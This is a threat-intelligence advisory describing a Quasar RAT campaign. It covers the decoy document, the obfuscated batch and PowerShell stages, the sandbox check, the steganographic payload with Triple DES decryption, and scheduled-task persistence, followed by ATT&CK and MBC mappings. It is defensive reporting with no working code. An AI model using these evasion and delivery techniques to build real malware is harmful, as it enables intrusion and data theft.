EXECUTIVE SUMMARY:
An ongoing campaign has been identified leveraging Quasar RAT, a widely circulated remote access trojan. This operation delivers the malware through a two-stage infection mechanism beginning with an obfuscated batch script. Victims are enticed using a decoy Office document themed around a game purchase agreement. The file execution flow begins with a Windows script that triggers the download of an additional batch file while simultaneously opening a non-malicious document to distract the user. This approach is specifically designed to decrease suspicion during the initial access phase. The second-stage batch file is heavily obfuscated, making static analysis and sandbox detection more difficult. It reconstructs and executes a multi-part payload delivery mechanism using native Windows utilities, particularly PowerShell. The campaign's use of evasion tactics and covert downloading methods introduces high operational risk to enterprises. Systems running Windows OS are particularly at risk due to the use of native scripting tools that require no external dependencies, making this attack difficult to detect without behavioral monitoring. Potential business impact includes unauthorized remote access, data theft, and covert surveillance on affected networks, especially in sectors lacking endpoint visibility or behavioral anomaly detection.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY:
An ongoing campaign has been identified leveraging Quasar RAT, a widely circulated remote access trojan. This operation delivers the malware through a two-stage infection mechanism beginning with an obfuscated batch script. Victims are enticed using a decoy Office document themed around a game purchase agreement. The file execution flow begins with a Windows script that triggers the download of an additional batch file while simultaneously opening a non-malicious document to distract the user. This approach is specifically designed to decrease suspicion during the initial access phase. The second-stage batch file is heavily obfuscated, making static analysis and sandbox detection more difficult. It reconstructs and executes a multi-part payload delivery mechanism using native Windows utilities, particularly PowerShell. The campaign's use of evasion tactics and covert downloading methods introduces high operational risk to enterprises. Systems running Windows OS are particularly at risk due to the use of native scripting tools that require no external dependencies, making this attack difficult to detect without behavioral monitoring. Potential business impact includes unauthorized remote access, data theft, and covert surveillance on affected networks, especially in sectors lacking endpoint visibility or behavioral anomaly detection.[emaillocker id="1283"]
The initial infection vector is a batch script which sets multiple environment variables and opens a decoy document to divert attention. This script silently downloads a second batch file from a remote hosting service. The downloaded file is extensively obfuscated, utilizing meaningless environment variable names, excessive use of goto statements, and code fragmentation. This technique is intended to complicate reverse engineering and automated detection. The script constructs and launches two PowerShell instances. The first PowerShell command performs sandbox evasion by querying disk names using the Get-Disk cmdlet. If the system disk is named with common sandbox identifiers like "QEMU HARDDISK," the script terminates itself, thereby avoiding analysis. The second PowerShell segment handles the core infection sequence by downloading a PNG image containing a base64-encoded payload. This image is fetched from a public file-sharing platform and decoded in-memory. The payload is decrypted using Triple DES in ECB mode with a hardcoded key and further decompressed using GZip streams. This results in a .NET assembly that is executed through reflection via GetAssemblies and Invoke methods. Additionally, the script implements persistence by registering a scheduled task using a locally dropped XML configuration. This ensures the malware's survival across reboots, facilitating prolonged remote access and potential lateral movement. Command-and-control communications are configured through a dynamic DNS-based relay, allowing attacker-controlled infrastructure flexibility.
This Quasar RAT campaign exemplifies a well-engineered malware deployment strategy combining obfuscation, sandbox evasion, and steganographic payload delivery. The dual PowerShell stages one for anti-analysis and another for payload decryption and execution demonstrate a layered and modular approach to infection. The use of legitimate file-hosting platforms and image files for payload delivery reflects an increasing trend of using non-executable formats to bypass network and host-based filters. By leveraging Windows-native tools, the attackers ensure stealth, avoiding the need to introduce suspicious binaries into the system. Persistence through scheduled tasks indicates a strategic goal of maintaining long-term access to compromised environments. This activity underscores the ongoing evolution of remote access trojans and their distribution tactics, particularly those that exploit trust and simplicity to bypass conventional defenses. The campaign's infrastructure and behavior align with trends observed in recent malware distribution operations where low detection and multi-layered payload delivery are prioritized. Its relevance is elevated due to the RAT's open-source nature, which allows constant modification and repackaging by multiple threat actors. This makes Quasar RAT-based campaigns a persistent and adaptable threat within the current cyber threat landscape.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-Technique |
| Initial Access | T1195 | Supply Chain Compromise | - |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| T1059.003 | Command and Scripting Interpreter | Windows Command Shell | |
| T1053.005 | Scheduled Task/Job | Scheduled Task | |
| Defense Evasion | T1497.001 | Virtualization/Sandbox Evasion | System Checks |
| T1027 | Obfuscated Files or Information | - | |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
MBC MAPPPING:
| Objective | Behavior ID | Behavior |
| Anti-Behavioral Analysis | B0036 | Integrity Checking |
| Persistence | B0013 | Scheduled Task |
| Execution | B0034 | Process Injection |
| Defense Evasion | B0009 | Virtualization/Sandbox Evasion |
| B0032 | Obfuscated Files or Information | |
| Command and Control | B0030 | Web Service |
| Data Manipulation | B0058 | Decryption |
| B0060 | Decompression |
REFERENCES:
The following reports contain further technical details:
[/emaillocker]